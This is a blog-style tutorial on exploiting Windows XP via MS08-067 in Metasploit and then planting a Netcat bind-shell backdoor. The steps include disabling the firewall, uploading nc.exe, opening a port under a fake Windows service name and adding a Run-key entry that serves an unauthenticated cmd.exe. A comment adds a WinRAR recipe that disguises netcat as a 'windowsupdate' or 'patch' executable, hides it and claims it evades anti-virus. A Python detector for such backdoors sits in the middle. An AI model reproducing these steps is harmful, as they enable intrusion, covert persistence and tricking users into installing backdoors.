
Creating a Netcat Backdoor on a Windows XP

Netcat is a versatile tool that performs a multitude of TCP/IP functions. One feature that is particularly useful to a penetration tester is the ability to "shovel" a shell from one system to another. In this section we use that feature to plant a backdoor on a Windows XP system whose firewall is ON. A backdoor here is a communication channel that gives us a remote command shell on a previously exploited system (the victim), so that we can get back in later without exploiting it again. Below I show how to exploit the host, adjust the firewall, and install a Netcat backdoor on that Windows XP (firewall ON) victim.

Run the Metasploit console:

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 869 exploits - 480 auxiliary - 144 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
       =[ svn r15401 updated today (2012.06.07)

Scan the target with nmap (typed inside the msf console, which hands the command to the OS):

msf > nmap
[*] exec: nmap
Nmap scan report for
Host is up (0.00s latency).
Not shown: 998 filtered ports
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds    # OPEN: SMB is reachable even though the firewall is on

Choose an exploit for the target (Windows XP EN SP2). Port 445 is reachable because the firewall's File and Printer Sharing exception (TCP 139/445, UDP 137/138, listed further down) is enabled, so the Server Service is exposed and MS08-067 is the natural candidate:

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)

Choose a payload for the target (Windows XP EN SP2), then set RHOST to the victim and LHOST to the attacking host:

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST
msf  exploit(ms08_067_netapi) > set LHOST

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port    # this port is open
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Run the exploit against Windows XP EN SP2 (automatic targeting fingerprints the service pack and NX setting for us):

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2012-06-07 13:28:59 +0200


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   # SYSTEM: the Server Service runs as LocalSystem, so this session already has full privileges
meterpreter > shell
Process 240 created.
Channel 1 created.

Drop into a shell on Windows XP and disable the firewall (this switches off the currently active profile only; the firewall is irrelevant for the meterpreter session, which is an outbound reverse connection, but it would block the bind shell we are about to install):

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Netsh firewall set opmode disable         # Disable FireWall
Netsh firewall set opmode disable
Ok.                                                           # It's OK - FireWall is OFF

Next, type exit to leave the shell channel and return to meterpreter, then upload netcat to the victim:

meterpreter > upload c:\\tools\\nc.exe c:\\windows\\system32\\   # Upload netcat from my local machine to windows xp
[*] uploading  : c:\tools\nc.exe -> c:\windows\system32\
[*] uploaded   : c:\tools\nc.exe -> c:\windows\system32\\nc.exe   # Upload status – Ok

meterpreter > shell
Process 976 created.
Channel 3 created.

Open a new TCP port (1234) in the firewall. Rather than leaving the firewall off, turn it back on for all profiles and add a single exception with an innocuous-looking name:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode          # show firewall status
netsh firewall show opmode

Domain profile configuration:
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
Operational mode                  = Disable               # firewall is OFF (the active profile we disabled above)
Exception mode                    = Enable

Local Area Connection firewall configuration:
Operational mode                  = Enable

C:\WINDOWS\system32>netsh firewall set opmode mode = enable exceptions = enable profile = all
netsh firewall set opmode mode = enable exceptions = enable profile = all
Ok.     # firewall back ON for all profiles with exceptions allowed, so apart from our new exception it looks untouched

C:\WINDOWS\system32>netsh firewall add portopening TCP 1234 "Windows Firewall Reporting Agent" enable all
netsh firewall add portopening TCP 1234 "Windows Firewall Reporting Agent" enable all
Ok.     # open TCP port 1234 under a name that blends in with Windows components

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting   # my new port
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Install the backdoor: make nc.exe start at every logon via the HKLM Run key

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"
The operation completed successfully  # it's OK

Now every time a user logs on, the Run key starts nc.exe, which detaches from the console (-d), listens on TCP 1234 (-l -p1234) and hands a cmd.exe to whoever connects (-e cmd.exe). This is a bind shell, so we connect to the victim rather than the victim calling back to us, and there is no authentication at all: anyone who can reach port 1234 gets the shell. Two caveats. First, HKLM\...\Run entries run in the context of the user who logs on, not as SYSTEM, so the shell we get later has that user's privileges (note the C:\Documents and Settings\metasploit prompt further down). Second, plain -l makes nc.exe exit as soon as the first session ends, so the backdoor is gone until the next logon; the Windows build's -L ("listen harder") re-listens after each session.

And it is easy to spot: the entry is not hidden from anyone who lists startup items on the host, for example with wmic:

wmic:root\cli>startup list full
Command=c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe  # not hidden
User=All Users
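Because the artefacts are this visible, they are also easy to detect. The following is an added example, not from the original post, written in Python rather than cmd because it is detection logic: it parses text shaped like `wmic startup list full` and `netsh firewall show portopening` output (the samples below are constructed here, modelled on the output shown above, with one benign ctfmon.exe entry added), flags startup commands that run a netcat binary, listen with -l/-L or execute a program with -e/-c, and correlates the listening port with any firewall exception opened for it. The function names and the sample data are this example's own; on a real host you would feed it the saved output of those two commands.

```python
import re
from typing import Dict, List

# Constructed sample shaped like `wmic startup list full` output: the page's
# nc entry plus one ordinary entry the detector must leave alone.
SAMPLE_STARTUP = """\
Caption=nc
Command=c:\\windows\\system32\\nc.exe -d -l -p1234 -e cmd.exe
Location=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
Name=nc
User=All Users

Caption=ctfmon.exe
Command=C:\\WINDOWS\\system32\\ctfmon.exe
Location=HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
Name=ctfmon.exe
User=metasploit
"""

# Constructed sample shaped like `netsh firewall show portopening` output.
SAMPLE_PORTOPENING = """\
Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting Agent
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
"""

NETCAT_NAMES = {"nc.exe", "nc", "nc64.exe", "ncat.exe", "ncat", "netcat.exe", "netcat"}
PORT_RE = re.compile(r"(?:^|\s)-p\s*(\d{1,5})")          # -p1234 or -p 8080
EXEC_RE = re.compile(r"(?:^|\s)-[ec]\s+(\S+)")           # -e cmd.exe / -c program
PORTOPENING_RE = re.compile(r"^\s*(\d+)\s+(TCP|UDP)\s+(\w+)\s+(.+?)\s*$", re.M)


def parse_startup(text: str) -> List[Dict[str, str]]:
    """Split wmic 'list full' output into one Key->Value dict per blank-line-separated block."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            if "=" in line:
                key, _, value = line.partition("=")
                entry[key.strip()] = value.strip()
        if entry:
            entries.append(entry)
    return entries


def parse_portopening(text: str) -> List[Dict[str, object]]:
    """Extract the port/protocol/mode/name rows from netsh's port table."""
    return [
        {"port": int(m.group(1)), "proto": m.group(2), "mode": m.group(3), "name": m.group(4)}
        for m in PORTOPENING_RE.finditer(text)
    ]


def analyze_command(command: str) -> Dict[str, object]:
    """Flag netcat-style listeners: netcat binary, -l/-L listening, -e/-c program execution."""
    tokens = command.split()
    exe = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower() if tokens else ""
    short_flags = [t for t in tokens[1:] if t.startswith("-") and not t.startswith("--")]
    listens = any(set(f[1:]) & {"l", "L"} for f in short_flags)
    port_m = PORT_RE.search(command)
    exec_m = EXEC_RE.search(command)
    reasons = []
    if exe in NETCAT_NAMES:
        reasons.append(f"netcat binary ({exe}) in a startup entry")
    if listens:
        reasons.append("listens for inbound connections (-l/-L)")
    if exec_m:
        reasons.append(f"executes {exec_m.group(1)} for each connection (-e/-c)")
    return {
        "exe": exe,
        "listens": listens,
        "port": int(port_m.group(1)) if port_m else None,
        "executes": exec_m.group(1) if exec_m else None,
        "reasons": reasons,
    }


def find_backdoors(startup_text: str, portopening_text: str) -> List[Dict[str, object]]:
    """Correlate suspicious startup commands with firewall exceptions opened for their port."""
    exceptions = {
        (row["port"], row["proto"]): row["name"]
        for row in parse_portopening(portopening_text)
        if str(row["mode"]).lower() == "enable"
    }
    hits = []
    for entry in parse_startup(startup_text):
        verdict = analyze_command(entry.get("Command", ""))
        if not verdict["reasons"]:
            continue
        verdict["location"] = entry.get("Location")
        verdict["user"] = entry.get("User")
        verdict["firewall_exception"] = exceptions.get((verdict["port"], "TCP"))
        hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in find_backdoors(SAMPLE_STARTUP, SAMPLE_PORTOPENING):
        print(f"{hit['location']} ({hit['user']}): {hit['exe']} port={hit['port']}")
        for reason in hit["reasons"]:
            print("  -", reason)
        if hit["firewall_exception"]:
            print(f"  - firewall exception for that port: {hit['firewall_exception']!r}")
```

The correlation step is the useful part: a Run-key command that listens on a port is suspicious on its own, but a matching firewall exception whose name does not correspond to any real Windows service is what turns it into a confident finding.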

Working or not?

From another machine, connect to port 1234 on the victim:

c:\tools>nc -v 1234
CASH-F32CDFF50A [] 1234 (?) open

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\metasploit>   # the shell runs as the logged-on user, not as SYSTEM

It's working!


  1. June 10, 2012 at 12:42 pm

    FROM –

    Netcat Advanced: Backdoor Creation

    Disclaimer: I am not responsible for how this information is used. I do not condone illegal activity. It is simple. If it isn’t your pc don’t mess with it.

    In this tutorial I will go into further detail on creating a netcat backdoor. This backdoor is undetectable by most anti-virus.

    For this tutorial you will need:
    WinRar Archiver

    After WinRar is installed, right click on nc.exe. Scroll down and click on Add to archive…

    Rename nc.rar to whatever you want (windowsupdate.rar, patch.rar, abstraktisabadass.rar, etc…)

    Under Archiving options, check the box "Create SFX archive"; you should see the archive name change from name.rar to name.exe.

    Click on the tab Advanced and on the right side click on SFX options

    Under Path to extract type


    Under Run after extraction type

    nc.exe -vv -d -L -p 8080 -e cmd.exe

    Under Run before extraction type

    %windir%\system32\cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\System32sys\nc.exe -vv -d -L -p 8080 -e cmd.exe" /f > nul

    Click on the tab Modes, then check Hide all and Skip existing files (you may not have the option Skip existing files depending on your version of WinRar. In this case don't worry about it. Your backdoor just won't be as cool as everyone else's. :D)

    Double-check everything and click Ok, then click Ok again to create the backdoor. You're finished!

    To connect to the victim's computer, use nc. You should see the victim's command prompt come up.
